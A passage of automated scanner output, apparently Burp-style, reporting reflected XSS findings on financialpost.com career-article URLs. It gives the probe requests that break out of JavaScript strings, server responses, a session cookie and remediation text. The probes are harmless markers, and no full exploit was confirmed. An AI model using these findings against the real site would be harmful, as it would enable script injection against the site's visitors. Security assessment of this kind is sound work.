Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/email/6e698'%3b8b8919e8594 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43228
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8274'%3b195d5cfee53 was submitted in the REST URL parameter 1. This input was echoed as b8274';195d5cfee53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogsb8274'%3b195d5cfee53/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36261
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5338f'%3bc1451072755 was submitted in the REST URL parameter 1. This input was echoed as 5338f';c1451072755 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers5338f'%3bc1451072755/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36303
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ebf'%3bee703a43543 was submitted in the REST URL parameter 1. This input was echoed as 60ebf';ee703a43543 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers60ebf'%3bee703a43543/Passionate+about+inclusion/3908742/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81033
Expires: Sun, 19 Dec 2010 03:15:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers60ebf';ee703a43543/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers60ebf';ee703a43543;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=31781956?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17bc9'%3b34da138a151 was submitted in the REST URL parameter 3. This input was echoed as 17bc9';34da138a151 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Passionate+about+inclusion/390874217bc9'%3b34da138a151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70051
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/passionate-about-inclusion/390874217bc9';34da138a151/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=passionate-about-inclusion;kw=390874217bc9';34da138a151;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39990 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29ff7'%3bb3f1c59f563 was submitted in the REST URL parameter 4. This input was echoed as 29ff7';b3f1c59f563 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Passionate+about+inclusion/3908742/29ff7'%3bb3f1c59f563 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37230
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5c25'%3b9ab1b8da1c9 was submitted in the REST URL parameter 1. This input was echoed as d5c25';9ab1b8da1c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careersd5c25'%3b9ab1b8da1c9/Pink+collar+jobs+spare+women+from+recession/3951473/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74447
Expires: Sun, 19 Dec 2010 03:15:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careersd5c25';9ab1b8da1c9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careersd5c25';9ab1b8da1c9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70150980?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7af'%3b3e6963f564a was submitted in the REST URL parameter 3. This input was echoed as bb7af';3e6963f564a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473bb7af'%3b3e6963f564a/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63862
Expires: Sun, 19 Dec 2010 03:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/pink-collar-jobs-spare-women-from-recession/3951473bb7af';3e6963f564a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=pink-collar-jobs-spare-women-from-recession;kw=3951473bb7af';3e6963f564a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42d4'%3b113cc4c7a9f was submitted in the REST URL parameter 4. This input was echoed as d42d4';113cc4c7a9f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473/d42d4'%3b113cc4c7a9f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37780
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67407'%3b92dac48a721 was submitted in the REST URL parameter 1. This input was echoed as 67407';92dac48a721 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers67407'%3b92dac48a721/Rules+keep+work+parties+festive/3978714/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74402
Expires: Sun, 19 Dec 2010 03:15:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers67407';92dac48a721/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers67407';92dac48a721;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95963968?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f598'%3b1d4c31151fb was submitted in the REST URL parameter 3. This input was echoed as 5f598';1d4c31151fb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Rules+keep+work+parties+festive/39787145f598'%3b1d4c31151fb/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63421
Expires: Sun, 19 Dec 2010 03:15:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/rules-keep-work-parties-festive/39787145f598';1d4c31151fb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=rules-keep-work-parties-festive;kw=39787145f598';1d4c31151fb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord= ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a25'%3b364cbeb8eca was submitted in the REST URL parameter 4. This input was echoed as 71a25';364cbeb8eca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Rules+keep+work+parties+festive/3978714/71a25'%3b364cbeb8eca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44245
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19264'%3b66fe6c3fb0d was submitted in the REST URL parameter 1. This input was echoed as 19264';66fe6c3fb0d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers19264'%3b66fe6c3fb0d/Texting+lazy+IMHO/3941140/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78645
Expires: Sun, 19 Dec 2010 03:15:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers19264';66fe6c3fb0d/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers19264';66fe6c3fb0d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69933413?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26269'%3b7e045e51a09 was submitted in the REST URL parameter 3. This input was echoed as 26269';7e045e51a09 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Texting+lazy+IMHO/394114026269'%3b7e045e51a09/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62901
Expires: Sun, 19 Dec 2010 03:15:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/texting-lazy-imho/394114026269';7e045e51a09/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=texting-lazy-imho;kw=394114026269';7e045e51a09;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95168182?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b2fc'%3b095459ca46b was submitted in the REST URL parameter 4. This input was echoed as 1b2fc';095459ca46b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Texting+lazy+IMHO/3941140/1b2fc'%3b095459ca46b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44669
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1639b'%3b9b5d88f64ad was submitted in the REST URL parameter 1. This input was echoed as 1639b';9b5d88f64ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers1639b'%3b9b5d88f64ad/writing+workers+with+children/3943108/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73488
Expires: Sun, 19 Dec 2010 03:15:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:33 GMT
Connection: close
